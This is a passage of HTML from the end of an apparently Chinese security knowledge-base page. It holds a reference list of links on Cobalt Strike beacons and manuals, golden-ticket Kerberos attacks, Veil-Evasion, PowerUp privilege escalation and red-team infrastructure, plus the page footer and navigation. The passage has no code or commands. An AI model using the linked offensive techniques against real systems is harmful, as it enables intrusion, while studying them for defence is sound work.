d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://blog.csdn.net/github_35186068/article/details/80518681" target="_blank" rel="noopener noreferrer">https://blog.csdn.net/github_35186068/article/details/80518681<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://pythonpig.github.io/2018/01/17/Cobaltstrike-SMB-beacon/" target="_blank" rel="noopener noreferrer">https://pythonpig.github.io/2018/01/17/Cobaltstrike-SMB-beacon/<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://www.varonis.com/blog/kerberos-how-to-stop-golden-tickets/" target="_blank" rel="noopener noreferrer">https://www.varonis.com/blog/kerberos-how-to-stop-golden-tickets/<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://lunamoore.github.io/2020/08/18/veil-evasion%E5%AE%89%E8%A3%85/" target="_blank" rel="noopener noreferrer">https://lunamoore.github.io/2020/08/18/veil-evasion%E5%AE%89%E8%A3%85/<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://blog.cobaltstrike.com/2014/09/09/infrastructure-for-ongoing-red-team-operations/" target="_blank" rel="noopener noreferrer">https://blog.cobaltstrike.com/2014/09/09/infrastructure-for-ongoing-red-team-operations/<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://wooyun.js.org/drops/Powershell%20%E6%8F%90%E6%9D%83%E6%A1%86%E6%9E%B6-Powerup.html" target="_blank" rel="noopener noreferrer">https://wooyun.js.org/drops/Powershell%20%E6%8F%90%E6%9D%83%E6%A1%86%E6%9E%B6-Powerup.html<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://docs.microsoft.com/zh-cn/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview" target="_blank" rel="noopener noreferrer">https://docs.microsoft.com/zh-cn/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://blog.ateam.qianxin.com/CobaltStrike4.0%E7%94%A8%E6%88%B7%E6%89%8B%E5%86%8C_%E4%B8%AD%E6%96%87%E7%BF%BB%E8%AF%91.pdf" target="_blank" rel="noopener noreferrer">https://blog.ateam.qianxin.com/CobaltStrike4.0%E7%94%A8%E6%88%B7%E6%89%8B%E5%86%8C_%E4%B8%AD%E6%96%87%E7%BF%BB%E8%AF%91.pdf<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p></blockquote></div> <footer class="page-edit"><!----> <div class="last-updated"><span class="prefix">上次更新:</span> <span class="time">12/18/2021, 12:46:42 PM</span></div></footer> <div class="page-nav"><p class="inner"><span class="prev"><a href="/knowledge/tools/burpsuite.html" class="prev"><i aria-label="icon: left" class="anticon anticon-left"><svg viewBox="64 64 896 896" focusable="false" data-icon="left" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M724 218.3V141c0-6.7-7.7-10.4-12.9-6.3L260.3 486.8a31.86 31.86 0 0 0 0 50.3l450.8 352.1c5.3 4.1 12.9.4 12.9-6.3v-77.3c0-4.9-2.3-9.6-6.1-12.6l-360-281 360-281.1c3.8-3 6.1-7.7 6.1-12.6z"></path></svg></i>
        BurpSuite简要手册
      </a></span> <span class="next"><a href="/knowledge/intranet/Aggressor-script.html">
        Aggressor-Script
        <i aria-label="icon: right" class="anticon anticon-right"><svg viewBox="64 64 896 896" focusable="false" data-icon="right" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M765.7 486.8L314.9 134.7A7.97 7.97 0 0 0 302 141v77.3c0 4.9 2.3 9.6 6.1 12.6l360 281.1-360 281.1c-3.9 3-6.1 7.7-6.1 12.6V883c0 6.7 7.7 10.4 12.9 6.3l450.8-352.1a31.96 31.96 0 0 0 0-50.4z"></path></svg></i></a></span></p></div> </main> <!----></div><div class="global-ui"></div></div>
    <script src="/assets/js/app.f7464420.js" defer></script><script src="/assets/js/2.26207483.js" defer></script><script src="/assets/js/65.7a2ccc50.js" defer></script>
  </body>
</html>